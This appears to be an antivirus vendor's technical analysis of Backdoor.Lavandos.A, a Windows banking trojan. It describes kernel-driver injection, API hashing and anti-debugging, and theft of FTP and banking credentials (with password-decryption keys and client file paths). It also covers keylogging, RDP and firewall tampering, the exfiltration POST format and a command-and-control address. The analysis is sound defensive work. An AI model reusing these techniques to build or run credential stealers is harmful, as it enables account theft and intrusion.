Backdoor.Lavandos.A

SYMPTOMS:

Extra http trafic.
Presence of:
        - HKLM\Software\Setting\PnPData
        - HKLM\Software\Setting\CryptoHash
        - HKLM\Software\Setting\CoreSettings
        - HKLM\SOFTWARE\SETTINGS\ErrorControl
        - HKLM\SOFTWARE\SETTINGS\DriveSettings
 

TECHNICAL DESCRIPTION:

The original file injects 3 dlls(setupapi.dll, dll.dll, lib.dll) and 1 driver(sfc.sys).
In spoolsv.exe process it injects lib.dll, dll.dll and the driver and in iexplore.exe it injects dll.dll .The files dropted are:

- depending on the browser on the infected computer: <%program file folder%> \ [IExplorer | Mozila Firefox | Opera] \ \setupapi.dll

 - <%system folder%>\sfcfiles.dll (lib.dll).

The clean sfcfiles.dll is cripted and packed in HKEY_LOCAL_MACHINE\SOFTWARE\SETTINGS\CryptoHash and also moved in sfcfiles.dat. The file sfcfiles.dat is deleted after a restart. The infected sfcfiles.dll has the same size and the same attributes(creation time, modification time) as the original file.

Implementation details :

The library names are crypted and it creats a new thread for decription every time it needs to load a library.
    Example:
         0 54 8 3F 34 37 7B 31 3D 76 27 <-> kernel32
The imported function names used are searched using a hash. It loads the corresponding library and calculates a hash for every function name. If the hash is equal with the hash for the searched function it retrieves the function address.
    Example:
         1F515831h  <-> GlobalAlloc        

Ida code:

It makes sure that the searched function code doesn't start with a INT3(0xCC) [anti-debbuging]. If it finds a INT3 as a first byte of the function the returned address is a wrong one and the program will crash soon.

Ida code:

The code is obfuscated:

Ida code: compute hash function
        - normal code:
      
       

        - obfuscated code:
          
        .

Thease 3 technics are used in every component file.

The driver is loaded with ZwSetSystemInformation. This driver is keeped on the disk for a very short time in /drivers/sfc.sys.
It opens the browser with:
        rundll32 url.dll_FileProtocolHandler http://www.google.com
  Each component file has some precise tasks:

It decrypts the access server from registry and downloads a package that contains 3 buffers packed whith aplib. It seems that on the server it has more then one version for every file. At every request a random version of the file is chosen.
 After unpacking the package, it crypts the buffers and saves them in 3 registry values:

        - HKLM\SOFTWARE\SETTINGS\CoreSettings  -> crypted dll.dll;
        - HKLM\SOFTWARE\SETTINGS\ErrorControl  -> crypted shellcode;
        - HKLM\SOFTWARE\SETTINGS\DriveSettings -> crypted driver sfc.sys

It accesses the server name from registry value HKLM\SOFTWARE\SETTINGS\HashSeed. This data is keeped crypted :
        http://mv[remove]o/page.php
        http://atl[remove]to/page.php
        http://sub[remove]ge.php
        http://ser[remove]ge.php
        http://allw[remove]ge.php
        http://go[remove]ge.php

wireshark capture:
        GET /vito/page.php?id=249D9E66C4923FA7&uid=9&link=a0&cookie=a7 HTTP/1.1
        Accept: */*
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
        Host: mv[remove]com
        Connection: Keep-Alive

        HTTP/1.1 200 OK
        Server: nginx/0.7.65
        Cache-Control: max-age=1
        Content-Encoding: gzip

Examples of request:
- GET /vito/page.php?query=249D9E66C4923FA7&hl=9&n=mozilla&do=index&client=a7&article=a8&id=unknown HTTP/1.1
- GET /vito/page.php?client=unknown&id=249D9E66C4923FA7&n=a3&var=a7&article=9&key=mozilla HTTP/1.1
- GET /vito/page.php?uid=a8&link=us&query=opera&lr=en&key=077F1DE5C2B8411D&id=a3&client=0                

2 Loads the driver.
    It decrypts the data from the registry value DriveSettings and loads the driver with LoadDriver() function. 

DLL.DLL

1 Download for update.

It downloads a packate that contains 3 buffers packed with aplib.
After unpacking the package, it saves the package in 2 registry values (after it crypts the corresponding buffers) and one file:
        - HKLM\SOFTWARE\SETTINGS\HashSeed -> crypted server names
        - HKLM\SOFTWARE\SETTINSG\PnPData  -> crypted 15 different dll.dll
        - <%system folder%>\sfcfiles.dll  -> lib.dll
All the 15 dlls from PnpData are injected in allmost all processes.

2 Hooks some functions:

    LdrGetProcedureAddress
    InternetOpenA
    InternetopenW
    WSAStartup

Ida Code:

3 Sends all private information:
       
All information is stored in registry key HKLM\Software\Microsoft\Windows. The names of the values represent  hashs for the stored data. It enumerates the values from the registry key every time that a value changes (RegNotifyChangeKeyValueEx), it reads the data from the values, crypts it and sends it.
The post message is:
    
        POST /vito/page.php?page=a9&lr=rnd&client=index&query=a3&do=rand&    key=249D9E66C4923FA7&n=0&cookie=index HTTP/1.1
        Content-Type: multipart/form-data; boundary=5c6438acde3a
        Host: mv[remove].com
        Content-Length: length(data)
        Cache-Control: no-cache

        --5c6438acde3a
        Content-Disposition: form-data; name="d"; filename="dd"
        Content-Type: application/octet-stream

        swapcase(base64(data from value))

4 Writes commands for the other 15 dlls:

It receives data (InternetReadFile), 0x7d000 bytes maxim, and if the buffer starts with "0000" it stores the buffer in a registry value.
The name of the command registry value is a hash computed on 9 bytes ("0000", the marker of the dll and a "\x00" byte).
The received buffer has the following structure: "[0000][marker][command]";
Exemple: "[0000][0012][0]" - the 12-th dll, command '0', ("[" "]" were added just for better understanding ).
The commands are similar for all the dlls:

"HC" -> Deletes the value HKLM\Software\Microsoft\Windows\CurrentVersion\AppData.
"CS" -> It takes a screenshot and the bmp format is encoded in jpeg format. This picture is  crypted  and saved in HKLM\Software\Microsoft\Windows\hash_string.
"BK" -> deletes the key  HKLM\Software\Settings
          -> crypts the string "BYE!" and sets the value  "SOFTWARE\Settings\Properties"    
          -> decrypts the data from the value CryptoHash
          -> deletes the key  HKLM\Software\Settings
          -> moves the file "/sfcfiles.dll" in "/sfcfiles.dll.bak" and writes in "/sfcfiles.dll"  the decrypted data from the value CryptoHash(which is the original sfcfiles.dll file)
"SK" -> it switches the desktop to "DefMainWin32XAWW"
"SB" -> deletes the key  HKLM\Software\Settings
           -> crypts the string "BYE!" and sets the value  "SOFTWARE\Settings\Properties"    
           -> decrypts the data from the value CryptoHash
           -> deletes the key  HKLM\Software\Settings
           -> moves the file "/sfcfiles.dll" in "/sfcfiles.dll.bak" and writes in "/sfcfiles.dll" the decrypted data from the value CryptoHash(which is the original sfcfiles.dll file)
           -> it switches the desktop to "DefMainWin32XAWW" and file work
"BE" -> it writes in " Software\Microsoft\Windows\AWKeyData" value a part of the command
"DU"and "LU" ->it decrypts a part of the command and writes it in a temp file which is executed afterwards.

SETUPAPI.DLL

Executes the shellcode.
It allocates some memory for decrypting the shellcode from ErrorControl registry value, the dll.dll   from CoreSettings value, the server names from HashSeed value and the 15 dll.dll from PnPData    and then runs the shellcode. The shellcode loads the dll and, in the same way as the original file (based on a hash), it finds out the address of  the DllRegisterServer function and then calls it. The server names are used by dll.dll for download.
Will be presented below the 15 dlls from PnPData.

Dll.dll_1 from PnPData

It hooks some functions:
        - LdrGetProcedureAddress
        - gethostbyname    
        - WSAAsyncGetHostByName
        - connect
        - send

The new LdrGetProcedureAddress checks if the name of the function, whose address is to be returned, has the same hash as one as the hooked function .
If it does the returned address is the hooked function address.

The new gethostbyname and the new WSAAsyncGetHostByName store the host name in a buffer.

The new connect function stores the ip address and port from sockaddr structure in some buffers.

The new send function takes the information about the ip address, socket port, hostname, username, password from the FTP protocol.
The last 3 parts of the information (hostname, username, password) are crypted with base64. A hash is computed for this buffer and if it does not exists in AppData value it is stored. Also the buffer is crypted and kept in HKLM\Software\Microsoft\Windows\hash_string (hash_string :if the hash is 0x1234abcd the hash_string is"1234abcd").

Ida code:

Pseudocode example

storeInValue function: (pseudocode)

{

input: 

    buffer  = ip port swapcase(base64(hostname))| swapcase(base64(username))| swapcase(base64(password))

    size_buffer  = strlen(buffer_2) + 8; buffer2 = swapcase(base64(hostname))| swapcase(base64(username))|swapcase(base64(password))

    flag_store_hash = 1; to store or not to store hash in HKLM\Software\ Microsoft\Windows\ CurrentVersion\ AppData

   buffer = [marker][buffer][400h] # the marker is the dll id

   hash_buffer = hashfunction(buffer)

   hash_string = encode_hex(hash_buffer)

   if flag_store_hash:

        AppData_hashes = RegQueryValueEx( HKLM\ Software\ Microsoft\ Windows\ CurrentVersion\ AppData )

        if hash_buffer in AppData_hashes:

              return 0;

        else:

             RegSetValueEx( HKLM\Software\Microsoft\Windows\CurrentVersion\AppData, AppData_hashes  + hash_buffer )

}

# first rol cript

  index = 0

  for x in buffer:

       buffer[index] = rol(x, hash_string[index%len_hash_string])

       index += 1

# second xor cript

  index = 0

  for x in buffer:

      buffer[index] = x ^ hash_string[index%len_hash_string]

      index += 1

 RegSetValueEx( HKLM\Software\Microsoft\Windows\hash_string, buffer )

Dll.dll_2 from PnPData

Mainly it steals information( ip, port, username, passwords ) about the ftp servers. It searches for the corresponding registry keys and files to get the wanted information.
All the ftp strings, registry and file names are crypted.

    1 FlashFXP :
        - Software\FlashFXP\AppData
        - Software\FlashFXP\DataFolder
        - Software\FlashFXP\Install Path
        - \FlashFXP\Sites.dat
        - the key for password decription :yA36zA48dEhfrvghGRg57h5UlDv3
    2 SecureFX :        
        - Software\VanDyke\SecureFX\Config Path    
    3 WS_FTP :
        - Software\Ipswitch\WS_FTP\DataDir
        - WS_FTP\Sites\ws_ftp.ini
    4 CoreFTP :
        - Software\FTPWare\CoreFTP\Sites stors passwords
    5 FileZilla :
        - Software\FileZilla\Install_Dir
        - \FileZilla.xml
        - the key for passwords decription : FILEZILLA1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ
    6 FTP Voyager :    
        - .DEFAULT\Software\Rhino Software\FTP Voyager\FTP
        - .DEFAULT\Software\Rhino Software\FTP Voyager\DataDirectory
        - FTPVoyager.ftp    
    7 WCX_FTP :
        - \wcx_ftp.ini
    8 BPFTP
        - Software\BulletProof Software\Options
        - Software\BulletProof Software\SitesDir
    9 GlobalSCAPE    
        - Software\GlobalSCAPE\Settings\Security\SiteManagerPath
    10 CoffeeCup Software :
        - Software\CoffeeCup Software\Internet\Profiles
    11 FTP Commander Pro :
            - SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FTP Commander Pro\UninstallString
        - ftplist.txt
     12 SmartFTP :
        - Software\SmartFTP\\Settings\General\Application Data Folder
     13 LeapFTP :
        - SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\LeapFTP\ UninstallString
        - Sites.ini
    14 FarFTP :
        - Software\Far\Plugins\FTP\Hosts\HostName

A buffer is created: buffer = [marker(4)][information][400h].
A hash is computed for this buffer and is kept, if it does not already exists, in HKLM\Software\Microsoft\Windows\CurrentVersion\AppData.
After the information is crypted it is stored in HKLM\Software\Microsoft\Windows\hash_string.

Dll.dll_3 from PnPData

It hooks some functions:
        - TranslateMessage
        - ExtTextOutA
        - TextOutW
        - CreateFileW    
        - LdrGetProcedureAddress
        - LdrLoadDll     

The new TranslateMessage function has keyloger role. It intercepts the pressed keys and saves them in a buffer. If the class name of the foreground window has  "java.sun.awt.bifit" (bifit ->banking and finances technologies on internet)the wparam parameter is chenged to printscreen key code (the screenshot is saved in the clipboard).

The new ExtTextOutA and TextOutW verifies if the text starts with "http" and if so, it stores it in a registry value.
    
The new CreateFileW
        If the file starts with "iBKS" it creates a structure containing :
            - "FILE"
            - 0x3EF
            - length of the file name
            - file name in widechar
            - file data
This file  contains the user's private encryption key. The scope is to steal information about a specific public-key-based Internet banking system which is used by a large number of Russian and Ukrainian banks.
A similar buffer is created [marker(2)][info][400h]. The hash is saved in HKLM\Software\Microsoft\Windows\CurrentVersion\AppData and the crypted data in HKLM\Software\Microsoft\Windows\hash_string.

It starts 2 more threads:
  - thread1
            Creates a buffer :["DATA1007"][flag module file name][found "java.sun.awt.bifit" string flag], organized as [marker(2)][buffer][400h].
            The hash is saved in HKLM\Software\Microsoft\Windows\CurrentVersion\AppData and the crypted data in HKLM\Software\Microsoft\Windows\hash_string.
                      
   - thread2
            It gets the data from the clipboard and saves it as "C:| data |:C". The buffer [marker(2)][info][400h] is created.
            The hash is saved in HKLM\Software\Microsoft\Windows\CurrentVersion\AppData and the crypted data in
            HKLM\Software\Microsoft\Windows\hash_string.

The new LdrGetProcedureAddress checks if the name of the function whose address is to be returned has the same hash as one as the hooked function . If it does the returned address is the hooked function address.

Dll.dll_4 from PnPData

It downloads new version for the content of the key values: CoreSettings, DriveSettings, ErrorControl.
It hooks some functions:
    - CreateFileA
    - recv
    - LdrGetProcedureAddress
    - LdrLoadDll

The new CreateFileA :
        If the size of the file is less than 0xFA00, it creates a structure contining :
            - "FILE"
            - 0x3FB
            - length of the file name
            - file name
            - file data
 A buffer [marker(3)][data][400h] is computed and the resulting hash is saved in AppData if it doesn't already exists.
The crypted buffer is saved in HKLM\Software\Microsoft\Windows\hash_string.
In the same manner it saves the file user.ini and all the *.cnf, *.ini files and the file interpro.ini from the current module folder.
The Inter-PRO use is the most effective in electronic payment systems like Bank-client ones, based on Web-technologies and focused on servicing of the remote clients through the Internet, or in any other systems where the authorized confirmation of client request for service is needed (in electronic trade systems, electronic insurance, paid information service, etc.).
      
The new recv function creates a new thread that reads and executes the command from the command registry value.
If the data received begins with "POST" it checks if the received data containes "5c6438acde3a". If it doesn't containes this strings (it,s not one of its own POST) and if it finds one of the strings "pass" or "pwd" it saves the buffer received: 
        - the hash for [marker(3)][buffer][400h] in HKLM\Software\Microsoft\Windows\CurrentVersion\AppData
        - the crypted buffer in HKLM\Software\Microsoft\Windows\hash_string
Saving POST-request parameters(username, password) it can target the Inter-PRO banking system.

Dll.dll_5 from PnPData

It hooks some functions :
        - CreateFileW
        - InternetConnectA
        - InternetConnectW
        - InternetWriteFile
The new CreateFileW :
 It checks if the name of the file contains some extensions through hashes. The extensions are:
            69806C03 => .js
            630dc380 => .css
            0641b482 => .dat
            906dae01 => .dll
            1f10c0b8 => .exe
            9adad019 => .flv
            c033b3c5 => .gif
            17c6e3a0 => .htc
            b4e835f6 => .htm
            1a72cae0 => .ico
            5f3b5800 => .jpg
            32f00900 => .png
            1e5e505c => .swf
            9d74560b => .ttf
            64d0302e => .txt
            3c344800 => .xml
    
 If the file name doesn't contain any of thease extensions, it creates a structure:
            - "FILE"
            - 0x3F9
            - length of the file name
            - file name
            - file data
 A buffer [marker(5)][data][400h] is computed and the resulting hash is saved in HKLM\Software\Microsoft\Windows\CurrentVersion\AppData if it doesn't already exists.    
The crypted buffer is saved in HKLM\Software\Microsoft\Windows\hash_string.

The new InternetConnectA and the new InternetConnectW :
It gets the active window and for every child window gets the text with SendMessage(hWindow,WM_GETTEXT,lenText,buffer).
If the buffer starts with "http" and it contains the string "bsi.dll" it stores the link. By retrieving data from an HTTP request to bsi.dll some can collect personal information, targeting the BS-Client  banking system.

It creates a thread that parses every logical drive. If the drives are removable, fixed or remote it searches throught all the folders recursively and if the path of the files contains one of the following strings and the string "CRYPTO", it saves the file in the same manner as before if the file has a size smaller than 0x3E800.
            0328f7db => \sec
            2e03f00c => .000
            d8003732 => \cert
            7fa6dfc8 => \keys
            87AC0CB7 => \crypto

It also creates an other thread that goes through SOFTWARE\Crypto Pro\Settings\USERS key. It enumerates all the subkeys and stores all the values names and values data:
            value name
            value data
            value name
            value data
            value name
            value data...
This information is added to the string:
           string = "FLAVURL: the link stored from the new InternetConnectA or InternetConnectW \r\n information" and will be stored:

 - A buffer [marker(5)][string][400h] is computed and the resulting hash is saved in HKLM\Software\Microsoft\Windows\CurrentVersion\AppData if it doesn't already exists.    
 - The crypted buffer is saved in HKLM\Software\Microsoft\Windows\hash_string.

CryptoPro CSP makes possible the use of reliable, certified cryptographic information-security tools as components of the wide range of tools and software.

The new InternetWriteFile :
If the number of bytes to write are between 5 and 0xc350 the string :
            data = "FLAVURL: the link stored from the new InternetConnectA or InternetConnectW \r\n the buffer to be written"  will be stored:
 - A buffer [marker(5)][data][400h] is computed and the resulting hash is saved in HKLM\Software\Microsoft\Windows\CurrentVersion\AppData if it doesn't already exists.    
 - The crypted buffer is saved in HKLM\Software\Microsoft\Windows\hash_string.

Dll.dll_6 from PnPData
    
It hookes the function CreateFileW and in the new function stores the file if the file name has the extension ".JSK", string identified by hash( 0F027E800).
The JKS file type is primarily associated with 'keytool' by Sun Microsystems, Inc.. Keytool is a key and certificate management utility. It allows users to administer their own public/private key pairs and associated certificates for use in self-authentication (where the user authenticates himself/herself to other users/services) or data integrity and authentication services, using digital signatures. It also allows users to cache the  public keys (in the form of certificates) of their communicating peers. A keystore is a storage facility for cryptographic keys and certificates.

Dll.dll_7 from PnPData

It hooks the RCN_R50Init function from FilialRCon.dll(used by Raiffeisen bank) for intercepting the private data(username,password) before encryption.

Dll.dll_9 from PnPData

It hooks a function from sks2xyz.dll.
The new function from sks2xyz.dll stores the file sign.cer(self-signed certificate used by Faktura bank)

Dll.dll_10 from PnPData

It builds a address table, containing the addresses of needed functions. Every function call is relative to the begining of the table to make the analysis harder.
It creates multiple threads that are synchronized with mutexes.
It hooks :
        - InternetReadFile
        - HttpSendRequestA                          
        - HttpSendRequestW
        - InternetReadFileExA
        - InternetReadFileExW
        - InternetCloseHandle
        - InternetQueryDataAvailable
        - the callback function assigned to the handle used by  asynchronous InternetConnection() function

The new functions have the role to steal and store personal information : username and passwords corresponding to the current internet connection.

    Ida Code:
   
       

   

Thease pieces of information are concatenated in a single string like:

        BA_urlString
        user=usernameString&pass=passwordString.

This string is crypted and stored in a registry value if the URL string contains words as pay, payment, money, bank, /admin, faktura words that are identified using hashes:

        - 0C200C900 => pay
        - 0C32DE341 => payment
        - 0CCA96A40 => money
        - 0FDB6305E => /admin
        - 79304AC0  => bank
        - 3C3B45C5  => faktura

Dll.dll_11 from PnPData

Hooked functions:
        - PFXImportCertStore
        - CertFindCertificateInStore

The new PFXImportCertStore:
   It stores the information:
      data = CRGR base64(password) | base64(subject name)i | base64(issuer name)i |       base64(cript(proprety of the certificate context)) |^ [marker(0xC)][data][400h]

It also creates a thread that gets and stores information about the most common system certificates.

Dll.dll_12 from PnPData

It has an advanced backdoor behaviour.
Depending on the module is running from identify by the hash: 0EDBCDA59h => WINLOGON.EXE:
If it's not running from winlogon.exe:

Values Software\Microsoft\ManualConfigA32 and Software\Microsoft\ManualConfigA64 keeps configuration information:
        - ManualConfigA32 keeps the day of the month when ManualConfigA64 was set.
        - data from ManualConfigA64 could be '0' or '1' or '2'
First it checks if in ManualConfigA32 is the current day of the month, and if it is it reads data from ManualConfigA64.
If it doesn't find current day in ManualConfigA32 will ask the server(storing something in a value key) for a value to be set in ManualConfigA64:

Ida code:

      
When asking the command it does the following:
        It stores the string "1111" :
        A buffer [marker(12h)][data][400h] is computed and the resulting hash is saved in HKLM\Software\Microsoft\Windows\CurrentVersion\AppData if it doesn't already exists.    
        The crypted buffer is saved in HKLM\Software\Microsoft\Windows\hash_string.

In a wireshark capture it can be observed :
    
            POST /vito/page.php?page=a9&lr=rnd&client=index&query=a3&do=rand&key=249D9E66C4923FA7&n=0&cookie=index HTTP/1.1
            Content-Type: multipart/form-data; boundary=5c6438acde3a
            Host: mv[remove].com
            Content-Length: 167
            Cache-Control: no-cache

            --5c6438acde3a
            Content-Disposition: form-data; name="d"; filename="dd"
            Content-Type: application/octet-stream

            eGaaadeXmthsbWaaaaaaap8aaad/aaaa

If we apply a series of functions :

"eGaaadeXmthsbWaaaaaaap8aaad/aaaa".swapcase().decode('base64').encode('hex') =>1200000031313131d207000000000000ff000000ff000000

          marker          "1111"     push 7D2h      arg_0         arg_4      arg_8
        12000000 [31313131] [d2070000] [00000000] [ff000000] [ff000000]
 And server responses with the following buffer "000000120" : [00000012][0],  00000012 is the dll id, and '0' is current command from server
The other 2 commands could be '1' or '2'.

If it didn't receive today from server  a command  like '1' or '2', then will not start the next two threads.
The threads are sincronized by mutexs: "wbfxet" for the first thread "xzxgavonkq" for the second thread.
The threads execute the same function but depending on the parameter, will do different things.

The first thread is specialized for Remote Desktop Connections:
       
It changes "SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections" value to 0 to enable the remote connections. It opens the Remote Desktop Service,  TermService and checks its status. If the service is not running it will be started. Terminal Services, is one of the components of Microsoft Windows  (both server and client versions) that allows a user to access applications and data on a remote computer over a network, using the Remote Desktop Protocol (RDP).

It sets the value  "SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\3389:TCP"  with  "3389:TCP:*:Enabled:@xpsp2res.dll"  to change the Windows Firewall configuration to allow access to the default port for Remove Desktop Connections.

The second thread specialized for oppening a server on random port:

Adds the module to the authorized application by changing the Windows Firewall configuration:
     It adds the value "SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy  \StandardProfile\AuthorizedApplications\List\ModuleName"
     The data value is "PathModule :*:Enabled: ModuleName".
It searches for a valid port to open a server, it tries just 4 times to find a valid port higher then 1000.
    
Both threads:
It decompress a component dll(packed with aplib and contained in current dll), PortexClient.dll, and gets the address of MappingServer function and executes it.
 The function is called with the following parameters:

Ida code:

The ip 188.165.214.122 resolves to "ns211520.ovh.net".

If it's running from winlogon.exe:

It opens a Desktop object with "Winlogon" name and assigns it to the calling thread so it can show some message boxes even if no user is logged on the computer.
It searches for that "string_hash_computer_name" using EnumWindows -> EnumChildWindows -> GetWindowTextA
It waits untill it finds it or untill it finds a secret key identified by a hash value: "9A79F222h". If that secret key is found, will show a message box  with the following information:  "key",  "string_hash_computer_name".
If it exists it deletes the registry key "SYSTEM\CurrentControlSet\Control\Terminal Server\Dos" to reset RDP Timeout settings.
If deletion succeeds will show a message box containing: "Origami: RDP Timeout settings was modified - reconnect to apply it"
It has an option to open cmd.exe shell and it will show a message box containing "Origami: Load cmd.exe shell?" with uType:
    MB_ICONQUESTION|MB_YESNO|MB_SERVICE_NOTIFICATION.
For the "Yes" option it will run that cmd.exe using WinExec.
After that a message box containing "Origami: press OK as finished to load explorer. Note - all your processes will be hided until you press OK" will be displayed. For the "OK" option a explorer.exe will be opened and a remote connection will be available in the infected sistem.
The cmd.exe can in any scope and it isn't visible for the user.

Dll.dll_13_14 from PnPData

It stores some files(string containing restriction) and all the ".key" files in that folder. Files with the extension ".KEY" :
contain registration information or a security code for a software program; often created when the program is registered; typically stored in the program's application folder or the system preferences folder.
Struct for Dll.dll_13 from PnPData:
        - "FILE"
        - 0x3ED
        - length of the file name
        - file name
        - file data
A buffer [marker(13h)][data][400h] is computed and the resulting hash is saved in HKLM\Software\Microsoft\Windows\CurrentVersion\AppData if it doesn't already exists.    
The crypted buffer is saved in HKLM\Software\Microsoft\Windows\hash_string.

Struct for Dll.dll_14 from PnPData:
        - "FILE"
        - 0x3E9
        - length of the file name
        - file name
        - file data
A buffer [marker(14h)][data][400h] is computed and the resulting hash is saved in HKLM\Software\Microsoft\Windows\CurrentVersion\AppData if it doesn't already exists.    
The crypted buffer is saved in HKLM\Software\Microsoft\Windows\hash_string.

It get the active window and for every child window gets the text with SendMessage(hWindow,WM_GETTEXT,lenText,buffer).
If the buffer starts with "http" and it contains the string "ibc" it stores the link.
    
Dll.dll_15 from PnPData

    - keylogger function
    - deletes the key : Software\Martin Prikryl\WinSCP 2\Configuration\Security
    - stores some information about the foreground windows.
    - stores some file ; the file name must not contain some strings.

The driver:

It creates a system thread that monitors the change of the "\Registry\Machine\Software\Settings" and sets a flag if the function ZwNotifyChangeKey returns STATUS_NOTIFY_CLEANUP
This status indicates that the notify change request has been completed due to closing the handle that made the notify change request.
It decripts the data from the value "Properties". If it is "BYE!" it sets a flag.
Decrypts the data from the values : ErrorControl, CoreSettings, HashSeed and PnPData and builds a buffer with the following structure:

buffer with registries data = data ErrorControl
                                                  size CoreSettings
                                                  data CoreSettings
                                                  0xBA
                                                  0x0BAD1C0DEh
                                                  size data ErrorControl
                                                  size data HashSeed
                                                  data HashSeed
                                                  size PnPData
                                                  data PnPData
The key for decryption is taken from the DigitalProductId value for  the values ErrorControl, CoreSettings, PnPData and from a buffer with descending values (from 0xFF to 0x00) for the value HashSeed.
It creates a double chained list containing for retaining information about the injected processes :
LIST:
    - pointer to the next element
    - pointer to the previous element
    - the process ID
    - a pointer to the buffer with the registries data
    - a pointer to a memory descriptor list for the buffer
    - the starting address of the mapped pages
    - the size of the buffer mentionate above
    - the inject phase (initial 0)
    - the entry point of the current process
    
In the caller-supplied load-image callback routine  :
VOID
(*PLOAD_IMAGE_NOTIFY_ROUTINE) (
        IN PUNICODE_STRING  FullImageName,
        IN HANDLE  ProcessId, // where image is mapped
        IN PIMAGE_INFO  ImageInfo
        );
Checks if the flag corresponding to the data("BYE!") value "Properties" is set and, if so, it leaves the routine.
It searches for ".exe", "\system32\ntdll.dll", "wininet.dll", "ws2_32.dll", "iertutil.dll", "msvbvm60.dll" in the FullImageName .
If the FullImageName contains ".exe" it searches the current process pid in the list discribed above and if it does't exist it adds a new node.
If the FullImageName contains "\system32\ntdll.dll" :
        - it identifies the function name ZwProtectVirtualMemory by hash (0D3DA486Dh) and gets the address using the KeServiceDescriptorTable:

Ida code:

        - it allocates a memory descriptor list for the buffer described above and maps the physical page.
If the FullImageName contains "wininet.dll" or "ws2_32.dll" or "iertutil.dll" or "msvbvm60.dll" :
If the node corresponding to the current process exists:

          - The inject phase becomes 1.

          - It creats a system thread(that executes in kernel mode - PsCreateSystemThread) that attaches itself to the running process. It patches the data from the ErrorControl value that represents the shellcode:
            pusha
            mov eax, the first dword at EntryPoint for the current process
            mov ebx, the second dword at EntryPoint+4 for the current process
            mov edi, adrOfEntryPoint for the current process

        - At the EntryPoint of the current process puts:
            push adressOfTheMappedPages
            ret
          where addressOfTheMappedPages points to the beginning of shellcode
       
        - After the patch the inject phase becomes 2.    

In a caller-suplied process-creation callback routine :

VOID
(*PCREATE_PROCESS_NOTIFY_ROUTINE) (
        IN HANDLE  ParentId,
        IN HANDLE  ProcessId,
        IN BOOLEAN  Create
        );

        If the last thread within the process has terminated for the corresponding node in the list :
        - it unmaps the pages
        - it frees the coresponding memory descriptor list
        - it releases the mutex which corresponded to the pid
        - it frees the structure

If the driver doesn't runs as a service:
   - It doesn't create the first thread.
  - Takes the data from the registry value DriveSettings and writes it in "\??\data from SystemRoot value\system32\drivers\sfc.sys".
  - It creates "\Registry\Machine\SYSTEM\CurrentControlSet\Services\sfc".
  - It set a dword value, "Type"- data value : 1.
  - It loads the driver "\Registry\Machine\SYSTEM\CurrentControlSet\Services\sfc" into the system.
  - It deletes "\??\data from SystemRoot value\system32\drivers\sfc.sys".
 

Removal instructions:

 Please let BitDefender disinfect your files.

ANALYZED BY: